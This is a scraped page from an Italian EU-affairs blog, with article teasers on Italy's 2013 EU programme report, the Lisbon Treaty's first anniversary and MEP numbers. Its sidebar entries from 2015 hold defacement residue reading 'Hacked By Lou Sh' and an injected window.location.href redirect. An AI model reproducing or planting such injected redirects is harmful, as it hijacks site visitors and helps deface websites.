EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Trattato di Lisbona

it

In attuazione della legge n. 234 lo scorso 18 gennaio Il Dipartimento delle politiche europee, ha trasmesso al Parlamento Italiano la Relazione programmatica per il 2013. Emanata il 24 Dicembre 2012 ci si sofferma sulle norme generali della partecipazione Italiana alla formazione e all'attuazione della normativa e delle politiche dell'Unione europea. La Relazione Programmatica il documento, approvato all’inizio di ogni anno, contiene la descrizione degli obiettivi che si vogliono raggiungere nei successivi 12 mesi e dei progetti possibili per poterli realizzare a livello concreto.

Ratificata dal Consiglio dei Ministri, la Relazione è stata approvata in concomitanza con la fine del Governo tecnico in Italia e di conseguenza, come ha spiegato Enzo Moavero Milanesi, Ministro per gli Affari Europei, essa si limita ad avere una funzione puramente informativa, spetterà poi al (...)

it

Nella storia dell’Unione Europea, i cambiamenti politici sono sempre stati determinati da rivoluzioni all’interno delle sfere della vita sociale ed economica, prima ancora che in quella amministrativa. Il primo decennio di questo nuovo millennio di cambiamenti in ogni aspetto della realtà ne ha visti molti. Un uso più massiccio delle nuove tecnologie, spazi e mercati aperti ad un maggiore numero di utenti, ma anche le minacce del terrorismo, le crisi finanziarie e i mutamenti climatici, sono solo alcuni delle questioni che hanno dato il via alle discussioni per l’aggiornamento e l’attualizzazione di un apparato normativo in grado di fronteggiare quanto avveniva, e tuttora avviene con sempre più rapida trasformazione, all’interno del territorio europeo. A tutto ciò si cercò di ovviare attraverso la redazione di un Trattato d Riforma dei precedenti trattati, il Trattato di Lisbona, appunto, firmato il 13 dicembre 2007 dai capi dei governi europei. Con questa riforma si è data soluzione alle sollecitazioni di rinnovamento delle istituzioni europee, ineludibili, alla luce anche del nuovo allargamento ai Paesi dell’Europa orientale. Nessuna fase dell’iter di attuazione del nuovo Trattato è passata nei vari Paesi senza far rumore. Polemiche si sono levate nel corso dello svolgimento dei negoziati, sia formali sia informale, discussioni hanno animato la sua redazione, e sempre più accese controversie hanno animato l’iter di approvazione all’interno dei vari Stati membri, in un intervallo che va dalla prima firma della ratifica dell’Ungheria del 2007 all’ultima della Repubblica Ceca del 2009. E gli echi delle proteste non sono scemati neanche a partire dal 1 dicembre 2009 quando il Trattato di Lisbona è entrato ufficialmente in vigore. Anzi, dicerie inverosimili e al limite della fantasia, hanno dato vita a leggende sul contenuto di questo Trattato, il cui significato resta sconosciuto alla maggior parte dell’opinione pubblica, anche a distanza di un anno dalla sua entrata in vigore, ma di cui tutti hanno sentito parlare almeno una volta anche se a volte in termini di predizioni apocalittiche.

Lisbona compie un anno

Questa serie di articoli che verranno pubblicati nei prossimi giorni hanno l’obiettivo di stilare un bilancio, sicuramente incompleto, del trattato di Lisbona ad un anno dalla sua entrata in vigore. Benché sia prematuro riteniamo sicuramente utile capire quali siano state (...)

it

Prima della fine della presidenza gli spagnoli riescono a portare a casa l'accordo per incrementare il numero dei parlamentari europei.

La questione sul numero degli eurodeputati è piuttosto complessa per via della ritardata entrata in vigore del trattato di Lisbona respinto dal referendum irlandese. A causa di questo ritardo le nuove disposizioni contenute nel trattato di Lisbona relativo al numero di eurodeputati da eleggere (...)

it

Per informare i cittadini italiani delle novità introdotte dal trattato di Lisbona la Rappresentanza in Italia della Commissione europea ha scomodato addirittura gli alieni! Al contrario l'approccio del Dipartimento delle Politiche Comunitarie è stato molto più "familiare".

Sono proprio due alieni infatti i protagonisti del video prodotto dalla Commissione europea in Italia per spiegare ai cittadini italiani le opportunità introdotte dal nuovo trattato. Nel video-spot i due alieni incerti in quale parte del mondo dirigersi, dopo aver ascoltato le novità introdotte (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France